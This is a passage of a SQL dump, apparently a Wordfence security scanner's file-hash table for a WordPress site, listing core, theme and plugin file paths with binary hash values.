�','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('�������2��f','wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php',0,'���b5lJ�#���v','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)P���gb�ma��','\0Ջ���7�l%�\Zg�26�\re�(�(P��W','',0,'?'),('����C��8<�>U�0','wp-content/themes/Kent/js/html5.js',0,'wnS���M�2KT�Z','wnS���M�2KT�Z','\r�gv�VPz0���\rH�%���*�%T�k�','',0,'?'),('��pg�nfՃ��:�','wp-includes/wp-includes/class-wp-block-supports.php',0,'}��C��ie�4���','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��u K��s��w�:','��c��q���F`���o�6y�RO~��5��','',0,'?'),('�8\Z�� �-L۷�=�','wp-includes/wp-includes/js/jquery/ui/core.min.js',0,'I�g{����!�S{5�','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�Q��$��� �o|C\\','�cS�/�8-(&�1H�4�����L�','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�[�\Z�z-b1����','wp-content/themes/storeone/images/featured-image-340x225.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/@v_��)w+�2I��','��@����is3��a��53[\"�&Y�\Z�','',0,'?'),('�d��RĆC�P���b&','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\rW�����Н','%��?�\Z�v�bq]��g�5Z)u�Ѷ\Z�o�\'�0','',0,'?'),('�i����O��4>2','wp-content/themes/kidzoo-lite/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ���ȸ��G\n','�ԛ>G��}�,/��~/ֳ�}Ő��\\�\Z�U�','',0,'?'),('�k\0���V�&c��뀻','wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php',0,'[��`�`b�=E�\"','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('�kIK����V[�� 5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s �15�','',0,'?'),('�lq��m�9�R:J?\Z','wp-content/themes/newsmag/assets/sass/navigation/_menus.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]��Gm�y���l','tl[ݞ�+&?Z!��K �;)EC��\0͑�{�','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� Ք���ۻ����!�|d�p�','',0,'?'),('�z�v��~��ZGL�8','wp-includes/wp-includes/revision.php',0,'Pق�g�OVjX�����','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('���������*_�\"','wp-content/plugins/wp-cerber/assets/flags/tc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sp�I��7��03CP','[���V�c\"��Z}t�a�n��%PB\ZgF�Yw','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�FV�y�o����','���RA��A�ȧ/��r�4H�-@��(\n �7R4�','',0,'?'),('����QHa2f� �hb�','wp-content/themes/newsmag/inc/admin/welcome-screen/img/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�j~��Ս:��M��$','!�T��K���{>��N�[�\'��,DR���̅*','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('��\n:�B�Ob�{��g','wp-content/themes/sg-window/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��YG�B��W<e˄','��e�\\I�Uo�oK����}Q�r\"|��w�\\�','',0,'?'),('�֥Lǽ��K�a�L��','wp-content/themes/hueman/assets/admin/img/footer-widgets-0.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���t�7�j\'��}�','!�۫�s`�YQ��dO\n���^U�]�m��M}','',0,'?'),('��h�W̍��? �6','wp-content/themes/newsmag/assets/images/banner.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���̓8�Dun \'\'O','�8� qp}�A��O�Ч]�IE�Jt�;�u���','',0,'?'),('��\nJ乐��1�cسDs','wp-content/themes/weblog/acmethemes/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U.c�ø���e��','����Ĕ����m��t{����S�3����f�','',0,'?'),('��EN�K�9U��$�l�H','wp-content/themes/promote/inc/kirki/assets/js/controls/dropdown-pages.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ك�A;�iY/�','����@��L��Y{\"�����:NJ�Dq\"[','',0,'?'),('���k/A�� �ā�','wp-includes/wp-includes/class-wp-network-query.php',0,'G��R�~|8�Z��1[�','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('��Qs|�c�LVH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?L�,k��|n�','�r�J�_9���~��uz�{�z������P','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�DeC���y����','�F�h�#>��Tƍŀ\ZO����;�#ؿX�aC�','',0,'?'),('�\Z���M`�yᕙd�','wp-content/plugins/wp-cerber/assets/flags/cm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�.��`�t�sI01','���F�]��g�ZBN��to Q��m�,�j','',0,'?'),('�2�� �ܚDSX�\Z�','wp-includes/wp-includes/js/jquery/suggest.min.js',0,'s\\+A)���n.;��','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('�9R��1C���btW','wp-content/themes/storeone/inc/theme-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q �G����I�A�٠�','��`�HJ�x�sբRs��}�q��4��䭆','',0,'?'),('�@�D?��nv�9�*O','wp-content/themes/advance/inc/kirki/assets/scss/controls/slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�жu9�>��\\��B','sj�� 6��V`f�\'jҧ��� �~I�nR','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gs�Ib<���w]G��','כ�ppr��xI�xP^�? ���N�%�u�','',0,'?'),('�k]�}>��9]ϟ�3��','wp-content/themes/advance/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Â�Z�?1gc ��M�','y5Le�oh�#�֬���փ�4��fH�z�','',0,'?'),('�n97�I.O�ҝ�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('�}:��S8��~��<��<','wp-content/themes/showcase-lite/css/default.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L���1�u�3>\r���','�F�\"\Z�yG$֝\">�ĕ\'m�V5�<���$\0','',0,'?'),('���6�j���~Rɢ��','wp-content/themes/promote/js/unminified/jquery.smooth-scroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&/�O9\Z{I��5~','#Y������|�<USm&�2�o\n���s�(�&','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4 춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('���W8k�_fʤ��5�','wp-includes/wp-includes/blocks/more/block.json',0,'_�ݜ����_ť;k)M','_�ݜ����_ť;k)M','�6��6Pa����D���@���f6�{��','',0,'?'),('��EH�CB� �m�','wp-content/themes/Yegor/FT/colors.php',0,'|݄���Q���','|݄���Q���','SU��C��ZL҆A�;)�J���\'�','',0,'?'),('���\"���Ɏ���lL0','wp-content/themes/maxbusiness/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�PS�\'��Z5�Z}��','���qa#T0��T�n=���8X\n�Bg%L�','',0,'?'),('��f餧xM�P]~B��','wp-content/plugins/akismet/class.akismet-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��� ���qE9g:I','v26�}۞���\Z�\no��g$�$�@[�C�\\V','',0,'?'),('���|t�Ƣ�V��T�','wp-content/themes/spidermag/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LWǎ�9��۴J��','�[y)���GGTϿ.f��V���T����O','',0,'?'),('��k䗐g%\"�M)]�','wp-content/themes/sg-window/inc/social-media-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W��eg0��(','B�\Z\'y�dM��a�s� 6i%?��z��_��b','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('��w��\Z\0���ꤲ���','wp-content/themes/storeone/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<C�i�w&f�Z��','�E� L��L�2$��;���j�xinDNr�+�1&�','',0,'?'),('���3�����/7T��','wp-content/themes/skt-pathway/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@v\Z��$�Hwi��+','η�X��e�0�C��/1��4�7I۵�7Ү','',0,'?'),('���x����|#g��','wp-content/themes/spidermag/assets/library/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('��ul�Z��;B��GB�','wp-includes/wp-includes/SimplePie/IRI.php',0,'\n��9,�zӄycE�','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��{��^vƍ����','Z��%��ĩZ�d�^����m���͖(8��ծ','',0,'?'),('�ج|tRe-�.h�ǛT','wp-includes/wp-includes/js/wp-pointer.js',0,'��8\Z߁@ \r�|�ɛ[d','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�\r���Wya���7�','wp-content/themes/showcase-lite/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��_����d辂OW��','�r��|�\"���c\0�VBE�iD/�� ��','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^� �v�4|f�%�Xg','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�!�\n3M�9�{�1���','wp-content/themes/promote/js/unminified/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�$���_��\"cOX','\nk�%��a;X�O��=$�Q�8m�?m2�{x��','',0,'?'),('�$����!���+&q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$sR��iNS&&$�d','��l��W�+��� ��5�� ���\rզI9Yk','',0,'?'),('�&B�H;,;\n�o\Zk҈','wp-content/themes/skt-pathway/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���kM\"��$ݩg�e','��E��V��S��]� s$k�F��g��:�','',0,'?'),('�.��\\a�\\��W�-Qr','wp-content/themes/promote/parts/part-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��L�g�k��U','9��\'�k�Z-g��&��ļ�xf���3���KC','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�9�٭���d���%���','wp-content/themes/vision-lite/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�F8�1P����}','�7uD@5�#�]A�m|D��}���.C��_�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t��K!��1��vDb','9���:��%�B�Ɖ\\c֏��WpX� �Q���','',0,'?'),('�=}2�D߶�Q��\n�','wp-includes/wp-includes/css/dist/block-library/common-rtl.css',0,'#�D�P�y��n�\\B�','#�D�P�y��n�\\B�','�AQY��tQ�aK hˤ�+\r�+�x,`�','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������`�ˎz��\Z�','*���}\0P������y��]�yOr�@�|','',0,'?'),('�DV�ɪl�-�XC��`\\','wp-content/plugins/wp-cerber/assets/flags/cu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝhm!�7���3.�','P�bLO���*]���3�o }���z�xN��','',0,'?'),('�n����2R�ƅV�aѣ','wp-content/themes/pine/css/color-blue.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��`�F��\r2���r�','�l�LF��&\Z��<���Z��F1b��;um�','',0,'?'),('��]$�B�IF��r�','wp-content/themes/capacious/inc/metabox/images/default-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�Π�_��G�,���','i��.J)�<-#,�3��vt��N�cE�u\'','',0,'?'),('��������Lx��,5�R','wp-content/themes/promote/js/promote.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�4���\Z�����juI','Ħ��2]���X�����&E��O���ԙŋ)','',0,'?'),('���;)���J+�Z�7f','wp-includes/wp-includes/js/wp-emoji.js',0,'*�����H;�q.�','*�����H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('�����`_��Nj+�~�','wp-content/themes/pine/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iKQa��ScA��','8��vp+����Yˆ#��>\\�94�R\'�\n���','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g_ZY�Y����/','oI���P�g��K7�$v��vxlk���t��Ea�S','',0,'?'),('���G�<m>`7i�8�','wp-includes/wp-includes/css/buttons-rtl.css',0,'i��ԝ]z~c6���g6','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('�����);���-','wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php',0,'�z����ħ7� �7V\Z','�z����ħ7� �7V\Z','�p���#4�o�p�p8�^�۰�^�F�+�ף�)l','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s|b$��ѓ<��','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('��o��Sb�)_k�\r�(','wp-includes/wp-includes/js/wp-api.js',0,'@�BY�f��b�b2�lз','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő� 2&�H','',0,'?'),('���j0�ʾ\n���','wp-content/themes/sg-window/img/scrollup.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v0�a(��\Zg�@ͩ','a_nƮÉ.�֘��q�`�3�`L�\\���r|S','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��Tb�̮�JU�','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('��`�B���~��\n','wp-content/themes/kidzoo-lite/template-parts/content-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8����=\Z#��{��','D#�*��t�0[�n�U��v#�P��-��yq ','',0,'?'),('��l\Z`<�#�� %��>}','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��7��B{�⋲I�','�N,�GKA���|��*��Y$��\"\Zg^v��B�N�','',0,'?'),('���3Ȉ��m�Y4���','wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('���3�qc;*�V\08�\\','wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӌؠ����v&��Ad','K��s;���o���ZÏ�Y�S���!e������','',0,'?'),('�\rK�-DR_6ĝҔ�','wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js',0,'7?�F5�sS5�7��,(','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�C5x��Һ\nI{h�%','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�H�P<�|3','��ڤ�C�p���9���L7<�~��d��l�%','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('�#-�8Q���R1ޭ','wp-content/themes/newsmag/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\n�iu\'��Jl֡7�','i���}��E���&1��t;&�5{��nQ�>','',0,'?'),('��/��-O�ͮ\'�]0','wp-content/themes/advance/inc/kirki/includes/class-kirki-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ks���7t���M��','�/�;!2��\\2�h�9D�DvZt:F�Ӻ�%','',0,'?'),('�\'���x�6g�f��r^','wp-content/themes/travel-stories/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϸ��.qK�����m�',';H��<Ȝׇ֏�+[k[��#m\0ٴ4�}','',0,'?'),('�1$K�;lU�+��_:','wp-content/themes/storeone/templates/homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n}��O[��!|]�','Ә.%q������m��m�����\n�r���C�,�','',0,'?'),('�8E<����:����','wp-content/themes/advance/images/link.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�̺��k���A/','e:Dffg�>�;�ӵ刳-�\\�W1+*-D�H','',0,'?'),('�@�_@ *^���,�|n','wp-includes/wp-includes/js/dist/shortcode.min.js',0,'j���� Q�l�*,�I�','j���� Q�l�*,�I�','�� w6R�(�K�T%ni�1��0�����[r','',0,'?'),('�B*�n��K�B��*\0','wp-content/themes/capacious/inc/theme-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�ۓ^\r�����S��','��ɠ\nZ�BQe#F-d(��&+|x�o<w~FJ��','',0,'?'),('�H���=���qb,��','wp-content/themes/storeone/js/simple-lightbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��g���w�h|N','1�\n}�KW�R�\\\"kf��m5�$�6��6\0\n�u','',0,'?'),('�L�3����^���\'�','wp-content/themes/advance/inc/admin/img/1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�ۨ��Χ�K͋e','��7�Z],�!`�\"�h���:��aǎ�������','',0,'?'),('�N<w()/�E��.�bI','wp-content/plugins/wp-cerber/assets/flags/st.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��l��Iy���`�f�','�x����˹�5��0��s� ��.:l���','',0,'?'),('�^=��F������L','wp-includes/wp-includes/blocks/index.php',0,'���C�Dn>�u�6j\r','���C�Dn>�u�6j\r','7#�x>֜�bo�R�4#;�ۤ��| J��','',0,'?'),('�n�$:�9r�1','wp-content/themes/storeone/template-parts/content-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F����� lX�$��','�7)`HnfF\r��:H6[��P�V~73^P','',0,'?'),('�|� (��i��/H�','wp-includes/wp-includes/js/tinymce/wp-tinymce.php',0,'1_H�0���US��@h�','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�2� �S�o-E��','����Dʹ�:&�o�n�����L���3�,E','',0,'?'),('��8��TJ\"�M��\\','wp-content/themes/advance/inc/kirki/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�4���l�t;Q','\03c��k���if{��\Z�g��6��kW���','',0,'?'),('����B����w\\Y5','wp-content/themes/wp-barrister/library/images/icon-in.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�`Á��ʉ����}','o�ou�c\rm�\Z�H�|�|���%�ʊ�ء','',0,'?'),('���S���{|�\"uZz�','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�/�� ��j�t��J�','w;*�Ҙ�\rp�<L$�\r��\r��H\Z���','',0,'?'),('��u>mI��5Z�m_��[','wp-content/themes/advance/inc/images/layout2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� \"��WE�p���H�4�','��6�=@�g�Û���i}T �e}����Н','',0,'?'),('��T������gM9ڛ','wp-includes/wp-includes/widgets.php',0,'��AĢ<ݤ9�fK:','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ж���t\Z�����','s<~d;lL�n�_u+1��jDO����\\�\0��','',0,'?'),('���@6�ߝ\0AhHc�','wp-content/plugins/wp-cerber/assets/flags/hm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��|���gm3��{�','wp-content/themes/anima/includes/hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��zu�GZc�\0�,','�&�ś����O]#��x��-\ZeB`��c��B','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M\"7����g��6>','WM�����r�0���y7:5э�C<�o����','',0,'?'),('��*.l*�5sݼѕע','wp-content/themes/gambit/inc/customizer/functions/custom-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݤ8\'�\\�J���$�','��ңo�\"����XL�(���!1�u9�\Z','',0,'?'),('����2��(7��#-','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�sIo�Op��M2��','�콲�o��5�~F뷘�\Z���Q�K,R��(','',0,'?'),('��=��_�j�����','wp-content/themes/hueman/option-tree/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�i�z4��\rT�\\G�','���F�}�Ռ���O�X���� #����#�','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�6��l]7[�:]X��','wp-content/themes/promote/inc/kirki/assets/scss/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����0�w���\'1j�','�Ȝ�7�Kc`�ɧ�k�����F9�L���','',0,'?'),('�7�0���,� 